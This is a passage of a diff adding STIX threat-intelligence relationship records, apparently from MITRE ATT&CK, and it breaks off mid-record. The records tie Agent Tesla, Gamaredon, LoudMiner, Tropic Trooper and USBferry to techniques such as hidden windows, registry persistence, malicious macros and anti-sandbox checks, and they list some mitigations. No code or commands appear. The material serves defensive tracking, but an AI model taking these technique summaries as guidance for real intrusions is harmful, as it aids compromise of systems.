+ "target_ref": "attack-pattern--cbb66055-0325-4111-aca0-40547b6ad5b0",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Agent Tesla April 2020",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/",
+ "description": "Jazi, H. (2020, April 16). New AgentTesla variant steals WiFi credentials. Retrieved May 19, 2020."
+ }
+ ],
+ "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) has used ProcessWindowStyle.Hidden to hide windows.(Citation: Malwarebytes Agent Tesla April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--75bd34c6-c8b3-4b5e-aac4-9e410515169c",
+ "type": "relationship",
+ "modified": "2020-05-19T17:32:26.398Z",
+ "created": "2020-05-19T17:32:26.398Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--e7a5229f-05eb-440e-b982-9a6d2b2b87c8",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Agent Tesla April 2020",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/",
+ "description": "Jazi, H. (2020, April 16). New AgentTesla variant steals WiFi credentials. Retrieved May 19, 2020."
+ }
+ ],
+ "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) has the ability to decrypt strings encrypted with the Rijndael symmetric encryption algorithm.(Citation: Malwarebytes Agent Tesla April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--a4105315-b63d-47c9-9526-3dd388d892b4",
+ "type": "relationship",
+ "modified": "2020-05-20T13:38:07.120Z",
+ "created": "2020-05-19T17:32:26.401Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--e7a5229f-05eb-440e-b982-9a6d2b2b87c8",
+ "target_ref": "attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Agent Tesla April 2020",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/",
+ "description": "Jazi, H. (2020, April 16). New AgentTesla variant steals WiFi credentials. Retrieved May 19, 2020."
+ }
+ ],
+ "description": " [Agent Tesla](https://attack.mitre.org/software/S0331) has he ability to perform anti-sandboxing and anti-virtualization checks.(Citation: Malwarebytes Agent Tesla April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--061f0d25-40fd-440a-b7e8-54ad0209f5f4",
+ "type": "relationship",
+ "modified": "2020-05-19T17:32:26.402Z",
+ "created": "2020-05-19T17:32:26.402Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--e7a5229f-05eb-440e-b982-9a6d2b2b87c8",
+ "target_ref": "attack-pattern--544b0346-29ad-41e1-a808-501bb4193f47",
+ "external_references": [
+ {
+ "source_name": "Bitdefender Agent Tesla April 2020",
+ "url": "https://labs.bitdefender.com/2020/04/oil-gas-spearphishing-campaigns-drop-agent-tesla-spyware-in-advance-of-historic-opec-deal/",
+ "description": "Arsene, L. (2020, April 21). Oil & Gas Spearphishing Campaigns Drop Agent Tesla Spyware in Advance of Historic OPEC+ Deal. Retrieved May 19, 2020."
+ }
+ ],
+ "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) has the ability to use form-grabbing to extract data from web data forms.(Citation: Bitdefender Agent Tesla April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--5bbbd951-0c4a-4293-b0a8-27751b953882",
+ "type": "relationship",
+ "modified": "2020-05-20T14:05:11.768Z",
+ "created": "2020-05-19T17:32:26.437Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--e7a5229f-05eb-440e-b982-9a6d2b2b87c8",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "Bitdefender Agent Tesla April 2020",
+ "url": "https://labs.bitdefender.com/2020/04/oil-gas-spearphishing-campaigns-drop-agent-tesla-spyware-in-advance-of-historic-opec-deal/",
+ "description": "Arsene, L. (2020, April 21). Oil & Gas Spearphishing Campaigns Drop Agent Tesla Spyware in Advance of Historic OPEC+ Deal. Retrieved May 19, 2020."
+ }
+ ],
+ "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) has been executed through malicious e-mail attachments (Citation: Bitdefender Agent Tesla April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--1cd41777-3d65-4e39-8de7-3951d1568c16",
+ "type": "relationship",
+ "modified": "2020-05-20T13:38:07.117Z",
+ "created": "2020-05-19T17:32:26.498Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Gamaredon April 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/",
+ "description": "Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020."
+ }
+ ],
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) tools can delete files used during an infection.(Citation: TrendMicro Gamaredon April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--bda5489b-7735-4793-8816-fc2238f6957f",
+ "type": "relationship",
+ "modified": "2020-06-22T17:55:32.117Z",
+ "created": "2020-05-19T20:39:12.429Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
+ "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Gamaredon April 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/",
+ "description": "Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020."
+ }
+ ],
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) tools have registered Run keys in the registry to give malicious VBS files persistence.(Citation: TrendMicro Gamaredon April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--f2d0fd0d-7bfc-4f3e-bd78-2d691c476046",
+ "type": "relationship",
+ "modified": "2020-06-22T18:23:55.083Z",
+ "created": "2020-05-19T20:39:12.450Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Gamaredon April 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/",
+ "description": "Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020."
+ }
+ ],
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) tools decrypted additional payloads from the C2.(Citation: TrendMicro Gamaredon April 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--86bcc5c3-456e-4bac-a419-54f54af80325",
+ "type": "relationship",
+ "modified": "2020-06-22T17:55:32.153Z",
+ "created": "2020-05-19T20:39:12.455Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Gamaredon April 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/",
+ "description": "Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020."
+ },
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) has embedded malicious macros in document templates, which executed VBScript. [Gamaredon Group](https://attack.mitre.org/groups/G0047) has also delivered Microsoft Outlook VBA projects with embedded macros.(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--3a6022ea-7647-4d61-8103-dd354d8dfd4d",
+ "type": "relationship",
+ "modified": "2020-06-22T18:23:55.089Z",
+ "created": "2020-05-19T20:39:12.457Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
+ "target_ref": "attack-pattern--dc31fe1e-d722-49da-8f5f-92c7b5aff534",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Gamaredon April 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/",
+ "description": "Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020."
+ },
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used DOCX files to download malicious DOT document templates. [Gamaredon Group](https://attack.mitre.org/groups/G0047) can also inject malicious macros or remote templates into documents already present on compromised systems.(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--7cabf1a6-5ad3-4c5d-83e8-161d49e082ac",
+ "type": "relationship",
+ "modified": "2020-06-22T17:55:32.125Z",
+ "created": "2020-05-19T20:39:12.459Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Gamaredon April 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/",
+ "description": "Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020."
+ },
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) has attempted to get users to click on Office attachments with malicious macros embedded.(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--e84791af-7bdb-4fe9-8e03-7a10a154c9a4",
+ "type": "relationship",
+ "modified": "2020-06-22T18:13:02.157Z",
+ "created": "2020-05-19T20:39:12.495Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
+ "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Gamaredon April 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/",
+ "description": "Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020."
+ },
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) has delivered spearphishing emails with malicious attachments to targets.(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--35624bc2-caf0-4124-88e8-6f60ae52ed9c",
+ "type": "relationship",
+ "modified": "2020-06-22T17:55:32.138Z",
+ "created": "2020-05-19T20:39:12.502Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f99f3dcc-683f-4936-8791-075ac5e58f10",
+ "target_ref": "attack-pattern--365be77f-fc0e-42ee-bac8-4faf806d9336",
+ "external_references": [
+ {
+ "source_name": "ESET LoudMiner June 2019",
+ "url": "https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/",
+ "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[LoudMiner](https://attack.mitre.org/software/S0451) used an MSI installer to install the virtualization software.(Citation: ESET LoudMiner June 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--e3540915-e2f8-4f99-8f81-57a566e9d115",
+ "type": "relationship",
+ "modified": "2020-06-23T00:48:35.422Z",
+ "created": "2020-05-19T21:26:54.333Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f99f3dcc-683f-4936-8791-075ac5e58f10",
+ "target_ref": "attack-pattern--6747daa2-3533-4e78-8fb8-446ebb86448a",
+ "external_references": [
+ {
+ "source_name": "ESET LoudMiner June 2019",
+ "url": "https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/",
+ "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[LoudMiner](https://attack.mitre.org/software/S0451) used plists to execute shell scripts and maintain persistence on boot. [LoudMiner](https://attack.mitre.org/software/S0451) also added plist files in /Library/LaunchDaemons with KeepAlive set to true, which would restart the process if stopped.(Citation: ESET LoudMiner June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--5fe00e0c-23f9-4520-936a-5c177a1cb44a",
+ "type": "relationship",
+ "modified": "2020-06-23T00:48:35.424Z",
+ "created": "2020-05-19T21:26:54.343Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f99f3dcc-683f-4936-8791-075ac5e58f10",
+ "target_ref": "attack-pattern--d742a578-d70e-4d0e-96a6-02a9c30204e6",
+ "external_references": [
+ {
+ "source_name": "ESET LoudMiner June 2019",
+ "url": "https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/",
+ "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[LoudMiner](https://attack.mitre.org/software/S0451) is typically bundled with pirated copies of Virtual Studio Technology (VST) for Windows and macOS.(Citation: ESET LoudMiner June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--870c08fa-6112-4d08-9b84-59df09f27b4d",
+ "type": "relationship",
+ "modified": "2020-06-23T00:48:35.425Z",
+ "created": "2020-05-19T21:26:54.399Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--76565741-3452-4069-ab08-80c0ea95bbeb",
+ "target_ref": "malware--cb741463-f0fe-42e0-8d45-bc7e8335f5ae",
+ "external_references": [
+ {
+ "description": "Unit42. (2016). SILVERTERRIER: THE RISE OF NIGERIAN BUSINESS EMAIL COMPROMISE. Retrieved November 13, 2018.",
+ "url": "https://www.paloaltonetworks.com/apps/pan/public/downloadResource?pagePath=/content/pan/en_US/resources/whitepapers/unit42-silverterrier-rise-of-nigerian-business-email-compromise",
+ "source_name": "Unit42 SilverTerrier 2018"
+ }
+ ],
+ "description": "(Citation: Unit42 SilverTerrier 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--e8948840-b0a0-4c10-87f4-022720dc8dd9",
+ "type": "relationship",
+ "modified": "2020-05-19T23:26:11.987Z",
+ "created": "2020-05-19T23:26:11.987Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--2995bc22-2851-4345-ad19-4e7e295be264",
+ "target_ref": "attack-pattern--e6415f09-df0e-48de-9aba-928c902b7549",
+ "description": "Limit the use of USB devices and removable media within a network.",
+ "relationship_type": "mitigates",
+ "id": "relationship--b957c285-b036-455d-a14f-8705838fd874",
+ "type": "relationship",
+ "modified": "2020-05-20T12:49:50.051Z",
+ "created": "2020-05-20T12:49:50.051Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--2995bc22-2851-4345-ad19-4e7e295be264",
+ "target_ref": "attack-pattern--a3e1e6c5-9c74-4fc0-a16c-a9d228c17829",
+ "description": "Limit the use of USB devices and removable media within a network.",
+ "relationship_type": "mitigates",
+ "id": "relationship--b2b112f8-27ed-449c-a9e1-e984139ee9f2",
+ "type": "relationship",
+ "modified": "2020-05-20T12:49:50.060Z",
+ "created": "2020-05-20T12:49:50.060Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--72dade3e-1cba-4182-b3b3-a77ca52f02a1",
+ "target_ref": "attack-pattern--f0589bc3-a6ae-425a-a3d5-5659bfee07f4",
+ "external_references": [
+ {
+ "url": "https://technet.microsoft.com/library/dn408187.aspx",
+ "description": "Microsoft. (2014, March 12). Configuring Additional LSA Protection. Retrieved November 27, 2017.",
+ "source_name": "Microsoft LSA Protection Mar 2014"
+ }
+ ],
+ "description": "On Windows 8.1 and Server 2012 R2, enable LSA Protection by setting the Registry key HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\RunAsPPL to dword:00000001. (Citation: Microsoft LSA Protection Mar 2014) LSA Protection ensures that LSA plug-ins and drivers are only loaded if they are digitally signed with a Microsoft signature and adhere to the Microsoft Security Development Lifecycle (SDL) process guidance. ",
+ "relationship_type": "mitigates",
+ "id": "relationship--26bc4aac-e7db-426f-af9f-b85fa60df277",
+ "type": "relationship",
+ "modified": "2020-05-20T13:13:48.991Z",
+ "created": "2020-05-20T13:13:48.991Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--2f316f6c-ae42-44fe-adf8-150989e0f6d3",
+ "target_ref": "attack-pattern--3489cfc5-640f-4bb3-a103-9137b97de79f",
+ "external_references": [
+ {
+ "source_name": "Windows Anonymous Enumeration of SAM Accounts",
+ "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-access-do-not-allow-anonymous-enumeration-of-sam-accounts-and-shares",
+ "description": "Microsoft. (2017, April 19). Network access: Do not allow anonymous enumeration of SAM accounts and shares. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "Enable Windows Group Policy \u201cDo Not Allow Anonymous Enumeration of SAM Accounts and Shares\u201d security setting to limit users who can enumerate network shares.(Citation: Windows Anonymous Enumeration of SAM Accounts)",
+ "relationship_type": "mitigates",
+ "id": "relationship--af69bb4e-4cdb-4a9d-afff-5508c99c1276",
+ "type": "relationship",
+ "modified": "2020-05-20T13:33:50.879Z",
+ "created": "2020-05-20T13:33:50.879Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--1dcaeb21-9348-42ea-950a-f842aaf1ae1f",
+ "target_ref": "attack-pattern--4f9ca633-15c5-463c-9724-bdcd54fde541",
+ "description": "Consider disabling Windows administrative shares.",
+ "relationship_type": "mitigates",
+ "id": "relationship--afe166b7-d849-4635-8e85-65b9d0bf11c5",
+ "type": "relationship",
+ "modified": "2020-05-20T15:19:50.991Z",
+ "created": "2020-05-20T15:19:50.991Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "Anomali Pirate Panda April 2020",
+ "url": "https://www.anomali.com/blog/anomali-suspects-that-china-backed-apt-pirate-panda-may-be-seeking-access-to-vietnam-government-data-center#When:15:00:00Z",
+ "description": "Moore, S. et al. (2020, April 30). Anomali Suspects that China-Backed APT Pirate Panda May Be Seeking Access to Vietnam Government Data Center. Retrieved May 19, 2020."
+ }
+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has lured victims into executing malware via malicious e-mail attachments.(Citation: Anomali Pirate Panda April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--283ba7b1-cd3b-44e9-bfae-70023c53d446",
+ "type": "relationship",
+ "modified": "2020-05-20T18:56:59.024Z",
+ "created": "2020-05-20T18:56:59.024Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "Anomali Pirate Panda April 2020",
+ "url": "https://www.anomali.com/blog/anomali-suspects-that-china-backed-apt-pirate-panda-may-be-seeking-access-to-vietnam-government-data-center#When:15:00:00Z",
+ "description": "Moore, S. et al. (2020, April 30). Anomali Suspects that China-Backed APT Pirate Panda May Be Seeking Access to Vietnam Government Data Center. Retrieved May 19, 2020."
+ },
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used HTTP in communication with the C2.(Citation: Anomali Pirate Panda April 2020)(Citation: TrendMicro Tropic Trooper May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--32bebd4b-6bbe-4a4e-86a1-0c49fda51259",
+ "type": "relationship",
+ "modified": "2020-05-21T16:39:27.634Z",
+ "created": "2020-05-20T19:05:37.549Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
+ "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
+ "external_references": [
+ {
+ "source_name": "Anomali Pirate Panda April 2020",
+ "url": "https://www.anomali.com/blog/anomali-suspects-that-china-backed-apt-pirate-panda-may-be-seeking-access-to-vietnam-government-data-center#When:15:00:00Z",
+ "description": "Moore, S. et al. (2020, April 30). Anomali Suspects that China-Backed APT Pirate Panda May Be Seeking Access to Vietnam Government Data Center. Retrieved May 19, 2020."
+ },
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has created shortcuts in the Startup folder to establish persistence.(Citation: Anomali Pirate Panda April 2020)(Citation: TrendMicro Tropic Trooper May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--69cc4413-80b4-45ed-a993-db34fe32fabe",
+ "type": "relationship",
+ "modified": "2020-05-21T14:55:00.547Z",
+ "created": "2020-05-20T19:05:37.554Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--75bba379-4ba1-467e-8c60-ec2b269ee984",
+ "target_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[USBferry](https://attack.mitre.org/software/S0452) can execute rundll32.exe in memory to avoid detection.(Citation: TrendMicro Tropic Trooper May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--95f2f687-4a70-4611-a420-2b8b53e2ee26",
+ "type": "relationship",
+ "modified": "2020-05-29T13:31:07.771Z",
+ "created": "2020-05-20T19:54:06.570Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--75bba379-4ba1-467e-8c60-ec2b269ee984",
+ "target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ }
+ ],
+ "description": "[USBferry](https://attack.mitre.org/software/S0452) can collect information from an air-gapped host machine.(Citation: TrendMicro Tropic Trooper May 2020)\t",
+ "relationship_type": "uses",
